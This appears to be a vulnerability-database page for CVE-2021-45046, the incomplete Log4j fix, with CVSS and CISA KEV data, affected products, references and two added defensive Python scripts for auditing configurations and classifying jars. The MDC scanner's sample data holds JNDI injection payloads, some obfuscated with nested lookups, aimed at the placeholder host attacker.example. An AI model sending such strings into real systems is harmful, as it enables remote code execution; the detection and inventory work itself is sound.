CVE-2021-45046

Critical · CISA KEV
CVSS 3.1 base score: 9.0 (Critical)
Published: Dec 14, 2021
Last Modified: Jun 17, 2026
KEV Listed: May 1, 2023
KEV Due: May 22, 2023 (overdue)

Description

It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allow attackers with control over Thread Context Map (MDC) input data, when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC), to craft malicious input data using a JNDI Lookup pattern, resulting in an information leak and remote code execution in some environments and local code execution in all environments. Log4j 2.16.0 (Java 8) and 2.12.2 (Java 7) fix this issue by removing support for message lookup patterns and disabling JNDI functionality by default.
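
The two preconditions in that description, a Pattern Layout that pulls Thread Context Map data into the layout and an attacker-controlled MDC value carrying a JNDI lookup, can both be checked mechanically. The following is an added example written for this page, not code from the Log4j project: it parses a constructed log4j2.xml for the conversions the description names, then scans constructed MDC values for a ${jndi:...} lookup, including ones assembled from nested ${lower:...}, ${upper:...} and ${key:-default} lookups (a generalisation of the page's "JNDI Lookup pattern", based on how Log4j's StrSubstitutor resolves nested lookups before the outer one). attacker.example is a placeholder host. The hardened configuration only removes the MDC conversions and so narrows exposure; the fix the page names is upgrading to 2.16.0 or 2.12.2.

```python
"""Audit a Log4j 2 configuration for the CVE-2021-45046 preconditions and scan
Thread Context (MDC) values for JNDI lookup strings.

Added example; not code from the Log4j project. The XML and MDC values below are
constructed, and attacker.example is a placeholder host."""
import re
import xml.etree.ElementTree as ET
from typing import Dict, List, Optional

# Constructed log4j2.xml that matches the advisory's preconditions on 2.15.0:
# "$${ctx:loginId}" defers the Context Lookup to event time, so the MDC value
# itself passes through the lookup resolver; "%X{sessionId}" is an MDC pattern.
VULNERABLE_CONFIG = """<Configuration status="WARN">
  <Appenders>
    <Console name="Console" target="SYSTEM_OUT">
      <PatternLayout pattern="%d %p [$${ctx:loginId}] %X{sessionId} %c - %m%n"/>
    </Console>
  </Appenders>
  <Loggers><Root level="info"><AppenderRef ref="Console"/></Root></Loggers>
</Configuration>"""

# Same layout without the MDC conversions. This only narrows exposure; the fix
# named on the page is upgrading to 2.16.0 (Java 8) or 2.12.2 (Java 7).
HARDENED_CONFIG = VULNERABLE_CONFIG.replace("[$${ctx:loginId}] %X{sessionId} ", "")

# Conversions the advisory names: ${ctx:...} / $${ctx:...}, %X, %mdc, %MDC.
RISKY_CONVERSIONS = re.compile(r"\$\$?\{ctx:|%(?:X|mdc|MDC)\b")


def risky_patterns(config_xml: str) -> List[str]:
    """Return every PatternLayout pattern that feeds MDC data into the layout."""
    root = ET.fromstring(config_xml)
    return [
        elem.get("pattern")
        for elem in root.iter("PatternLayout")
        if elem.get("pattern") and RISKY_CONVERSIONS.search(elem.get("pattern"))
    ]


# --- MDC value scanning -------------------------------------------------------
# A raw "${jndi:" is the obvious form. Log4j's StrSubstitutor resolves nested
# lookups first, so the scheme can be assembled from pieces such as ${lower:j},
# ${upper:n} or the ${key:-default} syntax (${::-j}). The reducer below mimics
# those three resolvers and nothing else; anything it cannot resolve stays put.
INNERMOST = re.compile(r"\$\{([^${}]*)\}")
JNDI_PREFIX = re.compile(r"\$\{jndi:", re.IGNORECASE)


def _resolve(body: str) -> Optional[str]:
    """Resolve one innermost ${body}; None means leave the token in place."""
    key = body.split(":", 1)[0].lower()
    if key == "jndi":
        return None  # never rewrite the token we are hunting for
    if ":-" in body:
        return body.split(":-", 1)[1]  # default-value syntax yields the default
    if key == "lower":
        return body.split(":", 1)[1].lower()
    if key == "upper":
        return body.split(":", 1)[1].upper()
    return None


def _substitute(match: "re.Match") -> str:
    resolved = _resolve(match.group(1))
    return match.group(0) if resolved is None else resolved


def contains_jndi_lookup(value: str, max_rounds: int = 16) -> bool:
    """True if the value is, or reduces to, a ${jndi:...} lookup."""
    reduced = value
    for _ in range(max_rounds):  # bounded: payloads nest only a few levels deep
        candidate = INNERMOST.sub(_substitute, reduced)
        if candidate == reduced:
            break
        reduced = candidate
    return JNDI_PREFIX.search(reduced) is not None


# Constructed MDC values as an application might store them via ThreadContext.put().
SAMPLE_MDC = {
    "benign": "alice",
    "dated": "${date:yyyy-MM-dd}",
    "direct": "${jndi:ldap://attacker.example/a}",
    "nested": "${${lower:J}${upper:n}di:${::-l}dap://attacker.example/a}",
    "defaulted": "${env:NOT_SET:-${jndi:rmi://attacker.example/b}}",
}


def hostile_mdc_keys(mdc: Dict[str, str]) -> List[str]:
    """Keys whose values contain a JNDI lookup, in dictionary order."""
    return [k for k, v in mdc.items() if contains_jndi_lookup(v)]


if __name__ == "__main__":
    print("risky patterns:", risky_patterns(VULNERABLE_CONFIG))
    print("after hardening:", risky_patterns(HARDENED_CONFIG))
    print("hostile MDC keys:", hostile_mdc_keys(SAMPLE_MDC))
```

Run it against a real log4j2.xml by passing the file's text to risky_patterns(); a non-empty result on a 2.15.0 deployment is the configuration the description warns about. contains_jndi_lookup() is a triage aid for logged or captured MDC values, not a substitute for upgrading, because it only models three of Log4j's lookups.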

CVSS Details

Base Score
9.0
Exploitability
2.2
Impact
6.0
Vector string
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
Attack Vector Network
Attack Complexity High
Privileges Required None
User Interaction None
Scope Changed
Confidentiality High
Integrity High
Availability High

Threat Intelligence

CISA Known Exploited Vulnerabilities catalog: added May 1, 2023, due May 22, 2023 (overdue).
Required action: Apply updates per vendor instructions.

Exploit & Patch Status
Actively Exploited (KEV)
Patch Available

Weaknesses (1)

CWE-917: Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection')

Affected Products (96 CPE matches; verbatim-duplicate rows collapsed)

Vendor | Product | Version | Range
apache | log4j | * | ≥ 2.0.1, < 2.12.2
apache | log4j | * | ≥ 2.13.0, < 2.16.0
apache | log4j | 2.0 | any
cvat | computer_vision_annotation_tool | * | any
intel | audio_development_kit | * | any
intel | datacenter_manager | * | any
intel | genomics_kernel_library | * | any
intel | oneapi | * | any
intel | secure_device_onboard | * | any
intel | sensor_solution_firmware_development_kit | * | any
intel | system_debugger | * | any
intel | system_studio | * | any
siemens | sppa-t3000_ses3000_firmware | * | any
siemens | sppa-t3000_ses3000 | * | any
siemens | captial | * | < 2019.1
siemens | captial | 2019.1 | any
siemens | comos | * | any
siemens | desigo_cc_advanced_reports | 4.0 | any
siemens | desigo_cc_advanced_reports | 4.1 | any
siemens | desigo_cc_advanced_reports | 4.2 | any
siemens | desigo_cc_advanced_reports | 5.0 | any
siemens | desigo_cc_advanced_reports | 5.1 | any
siemens | desigo_cc_info_center | 5.0 | any
siemens | desigo_cc_info_center | 5.1 | any
siemens | e-car_operation_center | * | < 2021-12-13
siemens | energy_engage | 3.1 | any
siemens | energyip | 8.5 | any
siemens | energyip | 8.6 | any
siemens | energyip | 8.7 | any
siemens | energyip | 9.0 | any
siemens | energyip_prepay | 3.7 | any
siemens | energyip_prepay | 3.8 | any
siemens | gma-manager | * | < 8.6.2j-398
siemens | head-end_system_universal_device_integration_system | * | any
siemens | industrial_edge_management | * | any
siemens | industrial_edge_management_hub | * | < 2021-12-13
siemens | logo\!_soft_comfort | * | any
siemens | mendix | * | any
siemens | mindsphere | * | < 2021-12-11
siemens | navigator | * | < 2021-12-13
siemens | nx | * | any
siemens | opcenter_intelligence | * | ≤ 3.2
siemens | operation_scheduler | * | ≤ 1.1.3
siemens | sentron_powermanager | 4.1 | any
siemens | sentron_powermanager | 4.2 | any
siemens | siguard_dsa | 4.2 | any
siemens | siguard_dsa | 4.3 | any
siemens | siguard_dsa | 4.4 | any
siemens | sipass_integrated | 2.80 | any
siemens | sipass_integrated | 2.85 | any
siemens | siveillance_command | * | ≤ 4.16.2.1
siemens | siveillance_control_pro | * | any
siemens | siveillance_identity | 1.5 | any
siemens | siveillance_identity | 1.6 | any
siemens | siveillance_vantage | * | any
siemens | siveillance_viewpoint | * | any
siemens | solid_edge_cam_pro | * | any
siemens | solid_edge_harness_design | * | < 2020
siemens | solid_edge_harness_design | 2020 | any
siemens | spectrum_power_4 | * | < 4.70
siemens | spectrum_power_4 | 4.70 | any
siemens | spectrum_power_7 | * | < 2.30
siemens | spectrum_power_7 | 2.30 | any
siemens | teamcenter | * | any
siemens | tracealertserverplus | * | any
siemens | vesys | * | < 2019.1
siemens | vesys | 2019.1 | any
siemens | xpedition_enterprise | * | any
siemens | xpedition_package_integrator | * | any
debian | debian_linux | 10.0 | any
debian | debian_linux | 11.0 | any
sonicwall | email_security | * | < 10.0.12
fedoraproject | fedora | 34 | any
fedoraproject | fedora | 35 | any
siemens | 6bk1602-0aa12-0tp0 | * | any
siemens | 6bk1602-0aa12-0tp0_firmware | * | < 2.7.0
siemens | 6bk1602-0aa22-0tp0 | * | any
siemens | 6bk1602-0aa22-0tp0_firmware | * | < 2.7.0
siemens | 6bk1602-0aa32-0tp0 | * | any
siemens | 6bk1602-0aa32-0tp0_firmware | * | < 2.7.0
siemens | 6bk1602-0aa42-0tp0 | * | any
siemens | 6bk1602-0aa42-0tp0_firmware | * | < 2.7.0
siemens | 6bk1602-0aa52-0tp0 | * | any
siemens | 6bk1602-0aa52-0tp0_firmware | * | < 2.7.0
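
The two apache/log4j ranges above are what an artifact inventory has to test against. The following is an added example written for this page, not code from the Log4j project: it reads the version Maven records in each jar's pom.properties (more trustworthy than a file name, which is routinely changed by shading and vendoring), compares it with the listed ranges, and treats any 2.0 release as affected because the page lists 2.0 separately. The jars it triages are fixtures written to a temporary directory; point triage_directory() at a real deployment tree instead. Only log4j-core jars are classified, since that is the artifact that contains the lookup implementation; a log4j-api fixture is included to show it being ignored.

```python
"""Classify Log4j 2 artifacts against the affected ranges listed on this page:
>= 2.0.1 < 2.12.2, >= 2.13.0 < 2.16.0, plus the 2.0 entries.

Added example, not from the Log4j project. The jars it inspects are fixtures
built in a temporary directory; real inventories point triage_directory() at a
deployment tree."""
import os
import re
import tempfile
import zipfile
from typing import Dict, Optional, Tuple

# Ranges as listed under Affected Products, as [lo, hi) version tuples.
AFFECTED_RANGES = (((2, 0, 1), (2, 12, 2)), ((2, 13, 0), (2, 16, 0)))

# Maven writes this file into every log4j-core jar; its "version=" line survives
# renaming and shading, which the file name does not.
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"

NUMERIC_PREFIX = re.compile(r"^(\d+(?:\.\d+)*)(.*)$")


def parse_version(text: str) -> Tuple[Tuple[int, ...], str]:
    """'2.14.1' -> ((2, 14, 1), ''); '2.0-beta9' -> ((2, 0, 0), '-beta9')."""
    m = NUMERIC_PREFIX.match(text.strip())
    if not m:
        raise ValueError(f"unparseable version: {text!r}")
    nums = tuple(int(p) for p in m.group(1).split("."))
    nums = nums + (0,) * (3 - len(nums))
    return nums[:3], m.group(2)


def is_affected(version: str) -> bool:
    """True when the version falls inside a listed range or is a 2.0 release."""
    nums, _qualifier = parse_version(version)
    if nums == (2, 0, 0):
        return True  # the page lists 2.0 (all updates) as its own rows
    return any(lo <= nums < hi for lo, hi in AFFECTED_RANGES)


def version_from_jar(path: str) -> Optional[str]:
    """Version recorded inside a log4j-core jar, or None if it is not log4j-core."""
    with zipfile.ZipFile(path) as jar:
        if POM_PROPERTIES not in jar.namelist():
            return None
        for line in jar.read(POM_PROPERTIES).decode("utf-8", "replace").splitlines():
            if line.startswith("version="):
                return line.split("=", 1)[1].strip()
    return None


def triage_directory(directory: str) -> Dict[str, str]:
    """Map each log4j-core jar under `directory` (by file name) to a verdict."""
    verdicts: Dict[str, str] = {}
    for root, _dirs, files in os.walk(directory):
        for name in files:
            if not name.endswith(".jar"):
                continue
            version = version_from_jar(os.path.join(root, name))
            if version is None:
                continue  # not log4j-core (or no Maven metadata): out of scope here
            verdicts[name] = "affected" if is_affected(version) else "not affected"
    return verdicts


def make_fixture_jar(directory: str, version: str, artifact: str = "log4j-core") -> str:
    """Constructed fixture: an otherwise empty jar carrying only pom.properties."""
    path = os.path.join(directory, f"{artifact}-{version}.jar")
    entry = POM_PROPERTIES.replace("log4j-core", artifact)
    with zipfile.ZipFile(path, "w") as jar:
        jar.writestr(entry, f"version={version}\ngroupId=org.apache.logging.log4j\n"
                            f"artifactId={artifact}\n")
    return path


def demo() -> Dict[str, str]:
    """Build fixture jars spanning the listed ranges and triage them."""
    with tempfile.TemporaryDirectory() as d:
        for v in ("2.0-beta9", "2.11.2", "2.12.2", "2.14.1", "2.15.0", "2.16.0"):
            make_fixture_jar(d, v)
        make_fixture_jar(d, "2.15.0", artifact="log4j-api")  # not log4j-core: ignored
        return triage_directory(d)


if __name__ == "__main__":
    for jar, verdict in sorted(demo().items()):
        print(f"{jar}: {verdict}")
```

Note that 2.15.0 is classified as affected: that is the point of this CVE, and the reason an inventory that stopped at "patched for CVE-2021-44228" has to be re-run against these ranges.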

References (22)

  • http://www.openwall.com/lists/oss-security/2021/12/14/4 (Mailing List, Mitigation, Third Party Advisory)
  • http://www.openwall.com/lists/oss-security/2021/12/15/3 (Mailing List, Third Party Advisory)
  • http://www.openwall.com/lists/oss-security/2021/12/18/1 (Mailing List, Third Party Advisory)
  • https://cert-portal.siemens.com/productcert/pdf/ssa-397453.pdf (Third Party Advisory)
  • https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf (Third Party Advisory)
  • https://cert-portal.siemens.com/productcert/pdf/ssa-661247.pdf (Third Party Advisory)
  • https://cert-portal.siemens.com/productcert/pdf/ssa-714170.pdf (Third Party Advisory)
  • https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/EOKPQGV24RRBBI4TBZUDQMM4MEH7MXCY/ (Mailing List, Release Notes)
  • https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SIG7FZULMNK2XF6FZRU4VWYDQXNMUGAJ/ (Mailing List, Release Notes)
  • https://logging.apache.org/log4j/2.x/security.html (Mitigation, Release Notes, Vendor Advisory)
  • https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032 (Third Party Advisory)
  • https://security.gentoo.org/glsa/202310-16 (Third Party Advisory)
  • https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd (Third Party Advisory)
  • https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-45046 (US Government Resource)
  • https://www.cve.org/CVERecord?id=CVE-2021-44228 (Not Applicable)
  • https://www.debian.org/security/2021/dsa-5022 (Third Party Advisory)
  • https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00646.html (Third Party Advisory)
  • https://www.kb.cert.org/vuls/id/930724 (Third Party Advisory, US Government Resource)
  • https://www.oracle.com/security-alerts/alert-cve-2021-44228.html (Third Party Advisory)
  • https://www.oracle.com/security-alerts/cpuapr2022.html (Third Party Advisory)
  • https://www.oracle.com/security-alerts/cpujan2022.html (Patch, Third Party Advisory)
  • https://www.oracle.com/security-alerts/cpujul2022.html (Third Party Advisory)

Remediation

  • https://www.oracle.com/security-alerts/cpujan2022.html (Patch, Third Party Advisory)